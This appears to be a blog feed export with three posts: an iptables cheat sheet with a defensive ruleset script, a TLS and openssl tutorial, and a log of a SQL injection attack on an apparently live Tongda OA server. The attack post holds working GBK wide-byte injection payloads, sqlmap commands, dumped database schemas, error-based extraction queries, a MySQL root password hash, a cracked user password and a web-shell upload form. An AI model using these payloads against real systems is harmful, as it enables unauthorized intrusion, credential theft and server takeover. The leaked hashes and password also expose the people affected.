<p>Save (<code>iptables-save</code> writes the ruleset to stdout; the CentOS init script keeps it in /etc/sysconfig/iptables)<br><figure class="highlight plain"><table><tr><td class="code"><pre><div class="line">iptables-save</div><div class="line">/etc/sysconfig/iptables</div></pre></td></tr></table></figure></p>
<p>Restore<br><code>iptables-restore</code></p>
<p>Limit ICMP per source with the recent module: the --set rule records the source of every accepted packet, and the --update rule drops a source that has been seen 3 times within 10 s, refreshing its timestamp on every match (with --rcheck instead of --update the timestamp is not refreshed, so the 10 s window counts from the first packet). The DROP rule must come before the ACCEPT rule.<br><figure class="highlight plain"><table><tr><td class="code"><pre><div class="line">iptables -R INPUT 2 -p icmp -m recent --update --seconds 10 --hitcount 3 --name PINGTEST --rsource -j DROP</div><div class="line"> -A INPUT -p icmp -m recent --set --name PINGTEST --rsource -j ACCEPT</div></pre></td></tr></table></figure></p>
<p>Cap concurrent connections from a single IP at 10 (the 11th is rejected)<br><code>iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 -j REJECT</code></p>
<p>Rate-limit new TCP connections: 60 per second with a burst of 20 are accepted and any NEW connection beyond that is dropped. Note that -m limit is a single global counter, not a per-IP one; for a per-source limit use -m hashlimit with --hashlimit-mode srcip.<br><figure class="highlight plain"><table><tr><td class="code"><pre><div class="line">-A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT</div><div class="line">-A INPUT -p tcp -m conntrack --ctstate NEW -j DROP</div></pre></td></tr></table></figure></p>
<p>Block an IP<br><code>iptables -I INPUT -s 121.69.131.144 -j DROP</code></p>
<p>CentOS<br><figure class="highlight plain"><table><tr><td class="code"><pre><div class="line">/sbin/iptables -I INPUT -p tcp --dport 8080 -j ACCEPT   # open port 8080</div><div class="line">/etc/rc.d/init.d/iptables save                        # save the configuration</div><div class="line">/etc/rc.d/init.d/iptables restart                     # restart the service</div><div class="line">/etc/init.d/iptables status</div></pre></td></tr></table></figure></p>]]></content>
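<![CDATA[
<p>The rules above are shown one at a time. As an added example (this is not code from the original post), here is the same policy assembled into one iptables-restore file by a small shell script: the state rules, the ssh whitelist, the recent and connlimit limits, a per-source hashlimit in place of the global -m limit, an egress rule that stops a reverse shell from opening a NEW outbound connection, and the LAN masquerade, in the order they have to appear. The admin host, LAN, interface and resolver addresses are placeholders chosen for the example.</p>

```shell
#!/bin/sh
# Added example, not from the original post: the cheat sheet's one-off commands
# combined into a single stateful ruleset in iptables-restore format, so the
# whole policy can be reviewed and loaded atomically instead of rule by rule.
# The addresses and interface names below are assumptions for the example.
ADMIN_HOST="${ADMIN_HOST:-192.168.6.1}"      # only host allowed to open ssh
LAN_NET="${LAN_NET:-192.168.10.0/24}"        # LAN that is masqueraded outwards
WAN_IF="${WAN_IF:-eth0}"                     # interface facing the outside
DNS_SERVER="${DNS_SERVER:-192.168.6.53}"     # resolver this host may talk to

# Print the ruleset. Within a chain the first matching rule wins, so the
# ESTABLISHED and whitelist rules come before anything that drops.
build_ruleset() {
cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
# loopback, replies to connections we already track, and nothing malformed
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -m conntrack --ctstate INVALID -j DROP
# ssh only from the admin host; port 22 from anywhere else falls to the DROP policy
-A INPUT -s ${ADMIN_HOST} -p tcp --dport 22 -m conntrack --ctstate NEW -j ACCEPT
# ICMP echo: a source seen 3 times within 10 s is dropped (--update must precede --set)
-A INPUT -p icmp --icmp-type echo-request -m recent --update --seconds 10 --hitcount 3 --name PINGTEST --rsource -j DROP
-A INPUT -p icmp --icmp-type echo-request -m recent --set --name PINGTEST --rsource -j ACCEPT
# web: at most 10 concurrent connections per source, and NEW connections
# rate-limited per source with hashlimit (-m limit alone is one global bucket)
-A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 --connlimit-mask 32 -j REJECT --reject-with tcp-reset
-A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW -m hashlimit --hashlimit-name web_new --hashlimit-mode srcip --hashlimit-above 15/minute --hashlimit-burst 20 -j DROP
-A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW -j ACCEPT
# egress: replies always, new connections only to DNS; a reverse shell that
# tries to call home must open a NEW outbound connection and is logged, then dropped
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A OUTPUT -d ${DNS_SERVER} -p udp --dport 53 -m conntrack --ctstate NEW -j ACCEPT
-A OUTPUT -m conntrack --ctstate NEW -j LOG --log-prefix "egress-new-drop: " --log-level 4
# LAN hosts may go out through ${WAN_IF}; only tracked replies come back in
-A FORWARD -s ${LAN_NET} -o ${WAN_IF} -m conntrack --ctstate NEW,ESTABLISHED,RELATED -j ACCEPT
-A FORWARD -i ${WAN_IF} -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
COMMIT
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -s ${LAN_NET} -o ${WAN_IF} -j MASQUERADE
COMMIT
EOF
}

# Number of rules the ruleset defines (useful when checking a generated file).
rule_count() {
	build_ruleset | grep -c '^-A'
}

# Parse-only check first, then load atomically (root required); the live
# tables are untouched if the parse step fails.
apply_ruleset() {
	build_ruleset | iptables-restore --test && build_ruleset | iptables-restore
}

if [ "${1:-}" = "--apply" ]; then
	apply_ruleset
else
	build_ruleset
fi
```

<p>Run the script without arguments to print the ruleset for review, and with <code>--apply</code> as root to load it. Because iptables-restore commits a whole table at once there is no moment where a half-applied policy (DROP policy set, ESTABLISHED rule not yet added) cuts off the ssh session, which is the usual accident when the commands are typed one by one.</p>
]]>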
<summary type="html">
<p>Chain</p>
<ol>
<li>PREROUTING (before the routing decision)</li>
<li>INPUT (packets addressed to this host)</li>
<li>FORWARD (packets routed through this host)</li>
<li>OUTPUT (packets generated by this host)</li>
<li>POSTROUTING (after the routing decision)</li>
</ol>
<p><img src="https://i.imgur.com/CAjJ7Y1.gif" alt=""></p>
</summary>
</entry>
<entry>
<title>PHP wide-byte error-based injection</title>
<link href="http://ruos.org/2015/07/04/PHP%E5%AE%BD%E5%AD%97%E8%8A%82%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/"/>
<id>http://ruos.org/2015/07/04/PHP宽字节报错注入/</id>
<published>2015-07-04T05:16:45.000Z</published>
<updated>2017-11-17T03:59:06.544Z</updated>
<content type="html"><![CDATA[<h4 id="注入测试"><a href="#注入测试" class="headerlink" title="Injection test"></a>Injection test</h4><p>Injection point; single quotes are escaped<br>POST <a href="http://211.137.*.*/logincheck.php" target="_blank" rel="external">http://211.137.*.*/logincheck.php</a><br>PASSWORD=1111&UNAME=admin</p>
<h5 id="TESTING01-测试宽字节"><a href="#TESTING01-测试宽字节" class="headerlink" title="TESTING01 wide-byte test"></a>TESTING01 wide-byte test</h5><p><code>PASSWORD=1111&UNAME=1%bf'</code></p><p>#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1縗''' at line 1<br>SQL statement: <code>SELECT * from USER where USER_ID='1縗'' or BYNAME='1縗''</code><br>File: D:/myoa/webroot/logincheck.php</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><div class="line">Note</div><div class="line">To block SQL injection PHP introduced magic_quotes_gpc; when it is on, single quotes, double quotes, backslashes and NUL are escaped automatically. When the database connection uses GBK this escaping can be defeated: wide-byte injection.</div><div class="line">Escaped quote: \'</div><div class="line">PASSWORD=123456&UNAME=admin%bf\'</div><div class="line">\ ==> %5C</div><div class="line">%bf%5c is read by the server as the single GBK character 縗, which swallows the backslash and leaves the quote unescaped</div></pre></td></tr></table></figure>
<h5 id="TESTING02-闭合语句"><a href="#TESTING02-闭合语句" class="headerlink" title="TESTING02 closing the statement"></a>TESTING02 closing the statement</h5><p><code>PASSWORD=123456&UNAME=admin%bf%5C'</code></p><p>SQL statement: <code>SELECT * from USER where USER_ID='admin縗'' or BYNAME='admin縗''</code></p><p>The application appends its own closing quote, which breaks the statement, so the rest of the line is commented out with # (%23).</p><p><code>PASSWORD=123456&UNAME=admin%bf'%23</code></p><p>SQL statement: <code>SELECT * from USER where USER_ID='admin縗'#' or BYNAME='admin縗'#'</code></p>
<h5 id="TESTING03-处理插入语句报错"><a href="#TESTING03-处理插入语句报错" class="headerlink" title="TESTING03 handling the INSERT error"></a>TESTING03 handling the INSERT error</h5><p>The SELECT behind the login now executes without error, but the INSERT that writes the login log fails with a syntax error.</p><p>#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1<br>SQL statement: <code>insert into SYS_LOG (USER_ID,TIME,IP,TYPE,REMARK) values ('admin縗'#','2015-09-04 13:41:11','27.211.123.74','10','USERNAME=admin縗'#')</code><br>File: D:/myoa/webroot/logincheck.php</p><p>Complete the INSERT ourselves before the comment<br><code>PASSWORD=123456&UNAME=admin%bf',2,3,4)%23</code></p><p>#1136: Column count doesn't match value count at row 1<br>SQL statement: <code>insert into SYS_LOG (USER_ID,TIME,IP,TYPE,REMARK) values ('admin縗',2,3,4)#','2015-09-04 13:50:55','27.211.123.74','10','USERNAME=admin縗',2,3,4)#')</code><br>File: D:/myoa/webroot/logincheck.php</p><p>The column count is off by one: five columns, four values. With a fifth value there is no error.</p><p>PAYLOAD<br><code>PASSWORD=123456&UNAME=admin%bf',2,3,4,5)%23</code></p>
<h4 id="尝试写SHELL"><a href="#尝试写SHELL" class="headerlink" title="Trying to write a shell"></a>Trying to write a shell</h4><p>Find the column count<br><code>PASSWORD=123456&UNAME=admin%bf' order by 1%23</code></p><p>A deliberately large column number shows what the error looks like<br><code>PASSWORD=123456&UNAME=admin%bf' order by 100%23</code></p><p>#1054: Unknown column '100' in 'order clause'<br>SQL statement: <code>SELECT * from USER where USER_ID='admin縗' order by 100#' or BYNAME='admin縗' order by 100#'</code><br>File: D:/myoa/webroot/logincheck.php</p><p>No error at 77 columns (77 of them!)<br><code>PASSWORD=123456&UNAME=admin%bf' order by 77%23</code><br><code>PASSWORD=123456&UNAME=admin%bf' and 1=2 union all select 123456,admin縗%23</code><br><code>PASSWORD=123456&UNAME=admin%bf' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,...,74,75,76,77 into outfile "D:/myoa/webroot/r1.txt"%23</code><br>Blank page (probably no FILE privilege, or the directory is not writable)</p>
<h4 id="sqlmap添加-自动跑库"><a href="#sqlmap添加-自动跑库" class="headerlink" title="sqlmap with a * injection marker"></a>sqlmap with a * injection marker</h4><figure class="highlight bash"><table><tr><td class="code"><pre><div class="line">python sqlmap.py -u "http://211.137.*.*/logincheck.php" --data="PASSWORD=123456&UNAME=admin%bf'*%23" --tables</div><div class="line"></div><div class="line">web server operating system: Windows</div><div class="line">web application technology: PHP 5.2.10, Apache 2.2.22</div><div class="line">back-end DBMS: MySQL 5.0</div><div class="line">Database: TRAIN</div><div class="line">[5 tables]</div><div class="line">+---------------------------------------+</div><div class="line">| kind |</div><div class="line">| pass |</div><div class="line">| price |</div><div class="line">| station |</div><div class="line">| train |</div><div class="line">+---------------------------------------+</div><div class="line"></div><div class="line">Database: TD_OA</div><div class="line">[204 tables]</div><div class="line">+---------------------------------------+</div><div class="line">| user |</div><div class="line"></div><div class="line">Table: user // login user data</div><div class="line">[77 columns]</div><div class="line">+------------------+------------------+</div><div class="line">| Column | Type |</div><div class="line">+------------------+------------------+</div><div class="line">| ADD_HOME | varchar(200) |</div><div class="line">| AUTHORIZE | int(11) |</div><div class="line">| AVATAR | varchar(20) |</div><div class="line">| BBS_COUNTER | int(11) |</div><div class="line">| BBS_SIGNATURE | text |</div><div class="line">| BIND_IP | text |</div><div class="line">| BIRTHDAY | date |</div><div class="line">| BKGROUND | text |</div><div class="line">| BP_NO | varchar(50) |</div><div class="line">| BYNAME | varchar(20) |</div><div class="line">| CALL_SOUND | char(2) |</div><div class="line">| CANBROADCAST | int(11) |</div><div class="line">| CONCERN_USER | text |</div><div class="line">| DEPT_ID | int(11) |</div><div class="line">| DEPT_ID_OTHER | text |</div><div class="line">| DISABLED | int(11) |</div><div class="line">| DUTY_TYPE | int(11) |</div><div class="line">| EMAIL | varchar(50) |</div><div class="line">| EMAIL_CAPACITY | int(11) |</div><div class="line">| FAX_NO_DEPT | varchar(50) |</div><div class="line">| FOLDER_CAPACITY | int(11) |</div><div class="line">| ICQ_NO | varchar(50) |</div><div class="line">| IS_LUNAR | char(1) |</div><div class="line">| KEY_SN | varchar(100) |</div><div class="line">| LAST_PASS_TIME | datetime |</div><div class="line">| LAST_VISIT_IP | varchar(100) |</div><div class="line">| LAST_VISIT_TIME | datetime |</div><div class="line">| LIMIT_LOGIN | char(1) |</div><div class="line">| MENU_EXPAND | char(2) |</div><div class="line">| MENU_IMAGE | varchar(20) |</div><div class="line">| MENU_TYPE | char(1) |</div><div class="line">| MOBIL_NO | varchar(50) |</div><div class="line">| MOBIL_NO_HIDDEN | char(1) |</div><div class="line">| MOBILE_PS1 | varchar(50) |</div><div class="line">| MOBILE_PS2 | varchar(50) |</div><div class="line">| MOBILE_SP | varchar(50) |</div><div class="line">| MSN | varchar(200) |</div><div class="line">| MY_RSS | text |</div><div class="line">| MY_STATUS | varchar(200) |</div><div class="line">| MYTABLE_LEFT | varchar(200) |</div><div class="line">| MYTABLE_RIGHT | varchar(200) |</div><div class="line">| NICK_NAME | varchar(50) |</div><div class="line">| NOT_LOGIN | varchar(20) |</div><div class="line">| NOT_VIEW_TABLE | varchar(20) |</div><div class="line">| NOT_VIEW_USER | varchar(20) |</div><div class="line">| OICQ_NO | varchar(50) |</div><div class="line">| ON_STATUS | char(1) |</div><div class="line">| ONLINE | int(11) |</div><div class="line">| PANEL | char(1) |</div><div class="line">| PASSWORD | varchar(50) |</div><div class="line">| PIC_ID | int(10) unsigned |</div><div class="line">| POST_DEPT | text |</div><div class="line">| POST_NO_HOME | varchar(50) |</div><div class="line">| POST_PRIV | varchar(50) |</div><div class="line">| REMARK | text |</div><div class="line">| SCORE | int(11) |</div><div class="line">| SECURE_KEY_SN | varchar(20) |</div><div class="line">| SEX | char(1) |</div><div class="line">| SHORTCUT | text |</div><div class="line">| SHOW_RSS | char(1) |</div><div class="line">| SMS_ON | char(1) |</div><div class="line">| TDER_FLAG | char(1) |</div><div class="line">| TEL_NO_DEPT | varchar(50) |</div><div class="line">| TEL_NO_HOME | varchar(50) |</div><div class="line">| THEME | varchar(10) |</div><div class="line">| UID | int(11) |</div><div class="line">| UIN | int(10) unsigned |</div><div class="line">| USEING_KEY | char(2) |</div><div class="line">| USER_DEFINE | text |</div><div class="line">| USER_ID | varchar(20) |</div><div class="line">| USER_NAME | varchar(200) |</div><div class="line">| USER_NO | int(11) |</div><div class="line">| USER_PRIV | varchar(10) |</div><div class="line">| USER_PRIV_OTHER | text |</div><div class="line">| WEATHER_CITY | varchar(20) |</div><div class="line">| WEBMAIL_CAPACITY | int(11) |</div><div class="line">| WEBMAIL_NUM | int(11) |</div><div class="line">+------------------+------------------+</div><div class="line"></div><div class="line"></div><div class="line">| version |</div><div class="line">| address |</div><div class="line">| address_group |</div><div class="line">| affair |</div><div class="line">| app_config |</div><div class="line">| app_log |</div><div class="line">| attachment_edit |</div><div class="line">| attend_config |</div><div class="line">| attend_duty |</div><div class="line">| attend_evection |</div><div class="line">| attend_holiday |</div><div class="line">| attend_leave |</div><div class="line">| attend_manager |</div><div class="line">| attend_out |</div><div class="line">| bbs_board |</div><div class="line">| bbs_comment |</div><div class="line">| book_info |</div><div class="line">| book_manage |</div><div class="line">| book_manager |</div><div class="line">| book_type |</div><div class="line">| bs_line |</div><div class="line">| calendar |</div><div class="line">| categories_type |</div><div class="line">| censor_data |</div><div class="line">| censor_module |</div><div class="line">| censor_words |</div><div class="line">| chatroom |</div><div class="line">| contact |</div><div class="line">| contract |</div><div class="line">| contract_line |</div><div class="line">| countdown |</div><div class="line">| cp_asset_type |</div><div class="line">| cp_assetcfg |</div><div class="line">| cp_cptl_info |</div><div class="line">| cp_dpct_sub |</div><div class="line">| cp_prcs_prop |</div><div class="line">| customer |</div><div class="line">| department |</div><div class="line">| dept_map |</div><div class="line">| diary |</div><div class="line">| diary_comment |</div><div class="line">| diary_comment_reply |</div><div class="line">| efax_account |</div><div class="line">| efax_receive_box |</div><div class="line">| efax_send_box |</div><div class="line">| email |</div><div class="line">| email_body |</div><div class="line">| email_box |</div><div class="line">| exam_data |</div><div class="line">| exam_flow |</div><div class="line">| exam_paper |</div><div class="line">| exam_quiz |</div><div class="line">| exam_quiz_set |</div><div class="line">| ext_user |</div><div class="line">| field_date |</div><div class="line">| fieldsetting |</div><div class="line">| file_content | //?</div><div class="line">| file_sort |</div><div class="line">| flow_form_type |</div><div class="line">| flow_print_tpl |</div><div class="line">| flow_process |</div><div class="line">| flow_query_tpl |</div><div class="line">| flow_rule |</div><div class="line">| flow_run |</div><div class="line">| flow_run_data |</div><div class="line">| flow_run_feedback |</div><div class="line">| flow_run_log |</div><div class="line">| flow_run_prcs |</div><div class="line">| flow_sort |</div><div class="line">| flow_timer |</div><div class="line">| flow_type |</div><div class="line">| hrms |</div><div class="line">| icqcontact_tb |</div><div class="line">| icqmsgs_tb |</div><div class="line">| icqservermsg_tb |</div><div class="line">| interface |</div><div class="line">| ip_rule |</div><div class="line">| linkman |</div><div class="line">| meeting |</div><div class="line">| meeting_equipment |</div><div class="line">| meeting_room |</div><div class="line">| module_priv |</div><div class="line">| mytable |</div><div class="line">| netchat |</div><div class="line">| netdisk |</div><div class="line">| netmeeting |</div><div class="line">| news |</div><div class="line">| news_comment |</div><div class="line">| notes |</div><div class="line">| notify |</div><div class="line">| oa_faxassign |</div><div class="line">| oa_faxbatch |</div><div class="line">| oa_faxconfig |</div><div class="line">| oa_faxfeecharge |</div><div class="line">| oa_faxfeeline |</div><div class="line">| oa_faxfeeprice |</div><div class="line">| oa_faxlog |</div><div class="line">| oa_faxremotehost |</div><div class="line">| oa_faxs |</div><div class="line">| oa_faxserverconfig |</div><div class="line">| oa_faxspecline |</div><div class="line">| oa_faxtemplates |</div><div class="line">| oa_options |</div><div class="line">| oa_source |</div><div class="line">| oa_source_used |</div><div class="line">| oa_stamps |</div><div class="line">| oc_log |</div><div class="line">| office_products |</div><div class="line">| office_task |</div><div class="line">| office_transhistory |</div><div class="line">| order_line |</div><div class="line">| picture |</div><div class="line">| plan_type |</div><div class="line">| product |</div><div class="line">| proj_bug |</div><div class="line">| proj_comment |</div><div class="line">| proj_cost |</div><div class="line">| proj_file |</div><div class="line">| proj_file_log |</div><div class="line">| proj_file_sort |</div><div class="line">| proj_forum |</div><div class="line">| proj_priv |</div><div class="line">| proj_project |</div><div class="line">| proj_task |</div><div class="line">| proj_task_log |</div><div class="line">| provider |</div><div class="line">| provider_linkman |</div><div class="line">| rms_file |</div><div class="line">| rms_lend |</div><div class="line">| rms_roll |</div><div class="line">| rms_roll_room |</div><div class="line">| rsa_keypair |</div><div class="line">| sal_data |</div><div class="line">| sal_flow |</div><div class="line">| sal_item |</div><div class="line">| sale_history |</div><div class="line">| sale_manager |</div><div class="line">| score_date |</div><div class="line">| score_flow |</div><div class="line">| score_group |</div><div class="line">| score_item |</div><div class="line">| seal |</div><div class="line">| seal_keylic |</div><div class="line">| seal_log |</div><div class="line">| secure_key |</div><div class="line">| service |</div><div class="line">| sms |</div><div class="line">| sms2 |</div><div class="line">| sms2_priv |</div><div class="line">| sms3 |</div><div class="line">| sms_body |</div><div class="line">| supply_history |</div><div class="line">| supply_order |</div><div class="line">| sys_code |</div><div class="line">| sys_function |</div><div class="line">| sys_log |</div><div class="line">| sys_menu |</div><div class="line">| sys_para |</div><div class="line">| task |</div><div class="line">| train_apply |</div><div class="line">| train_appoint_muster |</div><div class="line">| train_assess_data |</div><div class="line">| train_assess_item |</div><div class="line">| train_assess_title |</div><div class="line">| train_courses |</div><div class="line">| train_ctype |</div><div class="line">| train_info |</div><div class="line">| train_mail |</div><div class="line">| train_manager |</div><div class="line">| train_newcourse |</div><div class="line">| train_survey_data |</div><div class="line">| train_survey_item |</div><div class="line">| train_survey_title |</div><div class="line">| train_teachers |</div><div class="line">| train_ttype |</div><div class="line">| uni1 |</div><div class="line">| unit |</div><div class="line">| url |</div><div class="line">| user_group |</div><div class="line">| user_map |</div><div class="line">| user_online |</div><div class="line">| user_priv |</div><div class="line">| vehicle |</div><div class="line">| vehicle_maintenance |</div><div class="line">| vehicle_operator |</div><div class="line">| vehicle_usage |</div><div class="line">| versio1 |</div><div class="line">| vi_flow_run |</div><div class="line">| vi_user |</div><div class="line">| vote_data |</div><div class="line">| vote_item |</div><div class="line">| vote_title |</div><div class="line">| webmail |</div><div class="line">| wiki_ask |</div><div class="line">| wiki_ask_answer |</div><div class="line">| wiki_comment |</div><div class="line">| wiki_info |</div><div class="line">| winexe |</div><div class="line">| word_model |</div><div class="line">| work_detail |</div><div class="line">| work_person |</div><div class="line">| work_plan |</div><div class="line">| zl_file |</div><div class="line">+---------------------------------------+</div></pre></td></tr></table></figure>
<p><code>python sqlmap.py -u "http://211.137.*.*/logincheck.php" --data="PASSWORD=123456&UNAME=admin%bf'*%23" -D TRAIN -T pass --columns</code></p>
<p>Counting the columns: the error-based query sqlmap sends. GROUP BY on a key built from FLOOR(RAND(0)*2) triggers a duplicate-entry error, and the error message contains the CONCAT'ed value, so the column count is read straight out of the error text.<br><figure class="highlight sql"><table><tr><td class="code"><pre><div class="line">admin?' AND (SELECT 5821 FROM(SELECT COUNT(*),CONCAT(0x7171717071,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70617373 AND table_schema=0x545241494e),0x717a767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)#</div></pre></td></tr></table></figure></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><div class="line">admin?' AND (SELECT 5821 FROM(</div><div class="line">SELECT COUNT(*),CONCAT(qqqpq,/* CONCAT returns NULL as soon as one of its arguments is NULL */</div><div class="line">(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='pass' AND table_schema='TRAIN'), /* the column count; IFNULL substitutes a space when there is none */</div><div class="line">qzvpq,FLOOR(RAND(0)*2))x /* FLOOR keeps only the integer part, so RAND(0)*2 becomes a fixed sequence of 0s and 1s */</div><div class="line">FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) as a/* every derived table must have its own alias, here a */)#</div><div class="line">/*</div><div class="line">MySQL's CAST() and CONVERT() take a value of one type and produce a value of another type:</div><div class="line">CAST(value as type);</div><div class="line">CONVERT(value, type);</div><div class="line">i.e. CAST(xxx AS type), CONVERT(xxx, type).</div><div class="line">*/</div></pre></td></tr></table></figure>
<p>Dumping column names<br><figure class="highlight sql"><table><tr><td class="code"><pre><div class="line">admin?' AND (SELECT 4909 FROM(SELECT COUNT(*),</div><div class="line">CONCAT(0x7171717071,</div><div class="line">(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70617373 AND table_schema=0x545241494e LIMIT 0,1),/* column_name returns several rows; LIMIT picks one at a time */</div><div class="line">0x717a767071,FLOOR(RAND(0)*2))x </div><div class="line">FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)#</div><div class="line">/* SQL MID() returns part of a string. MySQL supports it; MS SQL Server and Oracle do not, and use SUBSTRING or SUBSTR instead. */</div><div class="line">SELECT MID(ColumnName, Start [, Length])</div><div class="line">FROM TableName</div></pre></td></tr></table></figure></p>
<p>--password: the current database user's password hash<br><figure class="highlight sql"><table><tr><td class="code"><pre><div class="line">admin?' AND (SELECT 7241 FROM(SELECT COUNT(*),CONCAT(0x7171717071,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 0,1),0x717a767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)#</div></pre></td></tr></table></figure></p>
<p>current user: 'root@127.0.0.1'<br>*91AF99F23C3D4ED85140D100433725DFA52BECEE</p><p>Application user password obtained through the injection<br>张* $1$772.CR0.$dlecp6h5kiOsrVX6Id2BY1 ==> md5(unix) 594188</p>
<h4 id="GETSHELL"><a href="#GETSHELL" class="headerlink" title="GETSHELL"></a>GETSHELL</h4><p>Tongda OA back-end getshell<br><a href="http://www.doc88.com/p-1334628630199.html" target="_blank" rel="external">http://www.doc88.com/p-1334628630199.html</a></p>
<figure class="highlight html"><table><tr><td class="code"><pre><div class="line">&lt;form id="frmUpload" enctype="multipart/form-data"</div><div class="line">action="http://211.137.*.*/general/vmeet/privateUpload.php?fileName=555.php+" method="post"&gt;</div><div class="line">Upload a new file:&lt;br&gt;</div><div class="line">&lt;input type="file" name="Filedata" size="50"&gt;&lt;br&gt;</div><div class="line">&lt;input type="submit" value="Upload"&gt;</div><div class="line">&lt;!-- http://192.168.56.139/general/vmeet/upload/temp/555.php.111 is the web shell after upload --&gt;</div><div class="line">&lt;/form&gt;</div></pre></td></tr></table></figure>]]></content>
<summary type="html">
<h4 id="注入测试"><a href="#注入测试" class="headerlink" title="Injection test"></a>Injection test</h4><p>Injection point; single quotes are escaped<br>POST <a href="http://211.137.*.*/logincheck.php"
</summary>
</entry>
<entry>
<title>SSL protocol</title>
<link href="http://ruos.org/2015/04/08/SSL/"/>
<id>http://ruos.org/2015/04/08/SSL/</id>
<published>2015-04-08T14:56:29.000Z</published>
<updated>2020-08-26T11:02:51.467Z</updated>
<content type="html"><![CDATA[<p>Terminology:<br>SSL (Secure Socket Layer)<br>TLS (Transport Layer Security)</p><h3 id="TLS协议"><a href="#TLS协议" class="headerlink" title="TLS protocol"></a>TLS protocol</h3><p><img src="https://blog.cloudflare.com/content/images/2014/Sep/keyless-comic-v1.gif" alt=""></p><p>Step 1: Alice sends the protocol version, a client-generated random number (Client random) and the cipher suites the client supports.<br>Step 2: Bob confirms the cipher suite both sides will use and sends his digital certificate together with a server-generated random number (Server random).<br>Step 3: Alice checks that the certificate is valid, generates a new random number (Premaster secret), encrypts it with the public key from the certificate and sends it to Bob.<br>Step 4: Bob uses his private key to recover the random number Alice sent (the Premaster secret).<br>Step 5: Alice and Bob each use the agreed cipher suite and the three random numbers to derive the "session key" that encrypts the rest of the conversation.</p><p><img src="https://blog.cloudflare.com/content/images/2014/Sep/ssl_handshake_rsa.jpg" alt=""></p><p>Tip:<br>1. Three random numbers go into the session key; the third one is sent encrypted with the server's public key, so nobody but the client (which generated it) and the server (which can decrypt it) knows it.<br>2. After the handshake the conversation is encrypted with the session key (symmetric encryption); the server's public and private keys are used only to encrypt and decrypt the premaster secret (asymmetric encryption) and for nothing else.<br>3. The server's public key is carried in the server's digital certificate.</p><p>Diffie-Hellman</p><p><img src="https://blog.cloudflare.com/content/images/2014/Sep/ssl_handshake_diffie_hellman.jpg" alt=""></p><p>curl -k <a href="https://www.baidu.com/img/baidu_jgylogo3.gif" target="_blank" rel="external">https://www.baidu.com/img/baidu_jgylogo3.gif</a></p><p>Wireshark</p><p>192.168.1.5 180.97.33.107 SSL Client Hello<br>180.97.33.107 192.168.1.5 TLSv1.2 Server Hello<br>180.97.33.107 192.168.1.5 TLSv1.2 Certificate, Server Key Exchange (server DH parameters), Server Hello Done<br>192.168.1.5 180.97.33.107 TLSv1.2 Client Key Exchange (client DH parameters), Change Cipher Spec, Encrypted Handshake Message<br>180.97.33.107 192.168.1.5 TLSv1.2 Change Cipher Spec, Encrypted Handshake Message</p><p>curl -v shows the exchange</p><p>* TLSv1.2 (OUT), TLS handshake, Client hello (1):<br>* TLSv1.2 (IN), TLS handshake, Server hello (2):<br>* NPN, negotiated HTTP1.1<br>* TLSv1.2 (IN), TLS handshake, Certificate (11):<br>* TLSv1.2 (IN), TLS handshake, Server key exchange (12):<br>* TLSv1.2 (IN), TLS handshake, Server finished (14):<br>* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):<br>* TLSv1.2 (OUT), TLS change cipher, Client hello (1):<br>* TLSv1.2 (OUT), TLS handshake, Unknown (67):<br>* TLSv1.2 (OUT), TLS handshake, Finished (20):<br>* TLSv1.2 (IN), TLS change cipher, Client hello (1):<br>* TLSv1.2 (IN), TLS handshake, Finished (20):<br>* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256</p><a id="more"></a><h3 id="证书生成"><a href="#证书生成" class="headerlink" title="Certificate generation"></a>Certificate generation</h3><p>openssl options</p><p>-new: create a certificate signing request<br>-config<br>-extfile<br>-subj</p><p>1. Self-signed certificate</p><p>Generate the private key<br><code>openssl genrsa -des3 -out server.key 4096</code></p><p>Strip the passphrase from the key<br><code>openssl rsa -in server.key -out nokey_server.key</code></p><p>Generate the CSR<br><code>openssl req -new -key server.key -out server.csr -config openssl.cfg -subj "/C=CN/ST=SC/L=CD/O=CerTest/OU=CerTest/CN=www.mytest.com"</code></p><p>CN = baidu.com (common name)<br>O = BeiJing Baidu Netcom Science Technology Co., Ltd (organization)<br>OU = service operation department. (organizational unit)<br>L = beijing (locality/city)<br>ST = beijing (state/province)<br>C = CN (country/region)</p><p>Generate the self-signed certificate<br><code>openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt</code></p><blockquote><p>openssl generates a private key, and from the private key a certificate signing request (CSR). A public certificate authority issues you a certificate from that CSR. A self-built CA can sign its own requests as well, although such a 